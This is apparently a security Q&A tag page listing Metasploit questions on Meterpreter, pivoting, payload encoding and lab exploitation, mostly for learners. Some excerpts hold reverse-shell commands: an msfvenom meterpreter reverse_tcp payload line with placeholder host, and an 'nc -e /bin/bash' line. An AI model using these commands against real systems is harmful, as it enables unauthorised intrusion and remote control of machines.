Questions tagged [metasploit]

Metasploit is an open source exploitation framework that acts as a tool for developing and executing exploit code against a remote target machine

The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.

Since version 3 of the Framework, Metasploit has been written primarily in Ruby. Version 2 and older were written in Perl. The various payloads, stagers, and shellcodes are primarily written in C, assembly, and Java.

Metasploit is developed on Github. Documentation and community forums are available on Rapid7's community site. Questions can also be asked in the #metasploit channel on Freenode.

497 questions
6
votes
2 answers

How does the Meterpreter load modules?

I've been using the Meterpreter for some time and I'm still quite new to it and one of the questions I have is how it's module loading works. Correct me if I'm wrong as I'm still learning how to use Metasploit, but to the best of my knowledge I know…
eclipse
  • 83
  • 4
6
votes
6 answers

Can you recommend a good book on Backtrack/Metasploit?

I have just downloaded Backtrack 5 R2 with Gnome and, while it looks cool, I don't really know where to start. I see it comes with Metasploit but, to be blunt, I still don't really understand what Metasploit is. A quick disclaimer, I'm a Windows guy…
JMK
  • 2,436
  • 7
  • 27
  • 38
6
votes
1 answer

Pivoting with Metasploit

I am trying to exploit a Windows VM on a different subnet behind a dual home Linux VM where I already have a shell. To keep it simple, I have a meterpreter reverse_tcp shell on the Linux VM (192.168.47.144) and the Windows VM (192.168.128.133) is…
B-MO
  • 313
  • 2
  • 6
6
votes
1 answer

Encode an executable file multiple time using MSF venom

I am trying multiple encode on same the executable file, but confused with the syntax. The Problem: To encode any executable file we can use the syntax: msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX.XXX.XX.X LPORT=XXXX -x…
neferpitou
  • 281
  • 1
  • 3
  • 8
6
votes
4 answers

Obtaining the IP address of a virtual machine to use Metasploit

I am beginning to learn Metasploit and, to play safe, am practicing it out on a virtual machine. The target machine, which is a virtual machine, is under NATing. How do I access it/ connect to it- from within the same network? outside the…
pnp
  • 1,818
  • 2
  • 26
  • 42
6
votes
1 answer

Set Session Metasploit

Metasploit exploits (exploits/windows/local/virtual_box_opengl_escape in specific) have an option called Session. What is this is to be set to? I am running Kali on virtual box on a Windows machine
Anuraag Baishya
  • 205
  • 1
  • 2
  • 8
6
votes
1 answer

How exactly do "hidden" processes work

How can a process be hidden inside another one? Is the process moved into another process and turned into a thread with it's own run loop? How exactly does a process get moved? I see this Metasploit command, migrate PID which seems to do this. I…
some_id
  • 385
  • 2
  • 14
5
votes
2 answers

MS08_067 with Metasploit

I'm learning how to use Metasploit. I'm using VirtualBox to run a VM with Kali Linux (192.168.56.101) and another with Windows XP SP1 (192.168.56.103). The two VMs can ping each other and Windows Firewall is disabled. I'm running Metasploit on Kali…
Kiuhnm
  • 243
  • 1
  • 2
  • 12
5
votes
4 answers

How do exploits and payloads work together?

I knew about the Metasploit Framework for a few years, but I never really got into it. I have some knowledge when it comes to networks, but I am not a Pro. I've tested some things with Metasploit and I was curious about one thing. (please correct…
icebox19
  • 51
  • 1
  • 2
5
votes
2 answers

Pentest -- handling multiple reverse shells

I'm running a pentest and im expecting reverse shells from multiple shells connecting back as :- nc -e /bin/bash However, I'm trying to figure out the best way to manage these incoming connections. Are there any suggestions on…
user1187
5
votes
1 answer

Resources for determining if Metasploit has exploit for given CVE

Are there any reliable resources for finding whether or not a Metasploit exploit exists for a given CVE? I have found CVE Details to be woefully out of date with regards to keeping this information up to date.
Rubber Duck
  • 516
  • 1
  • 5
  • 16
5
votes
3 answers

Metasploit Get Shell Through NAT

Ok first of all this is legal and I have it in writing my friend and I are attacking eachother to get better and not break the law. Setup I have a VMWare image running BT5R3. It uses VMWare's NAT then my network is behind a router using NAT. From…
Four_0h_Three
  • 1,225
  • 2
  • 8
  • 13
5
votes
1 answer

POC of a Java exploit using leftover JREs

Summary: I would like to show a proof of concept of a Java exploit using an old JRE on an up-to-date machine to cut short discussions on the "but we are patched so why removing older versions" subject. (I am not a developer - apologies for possible…
WoJ
  • 8,957
  • 2
  • 32
  • 51
5
votes
2 answers

Tools/methods helping to determine application/protocol serving specific port

I do blackbox testing of the server and figured out that there is a bunch of listening ports. I need to determine what services/protocols those ports are used for. What I've tried so far is to use Armitage (as far as I've understood it runs some…
5
votes
2 answers

Metasploit wmap_run -e hangs with Using code '404' as not found

Background When I run Metasploit, it hangs at the same place no matter what I do. It stops at this line, [*] Using code '404' as not found. Steps to reproduce, msf > mfsconsole msf > load wmap msf > wmap_sites -l msf > wmap_targets -t…
NDiaz
  • 151
  • 5
1 2
3
33 34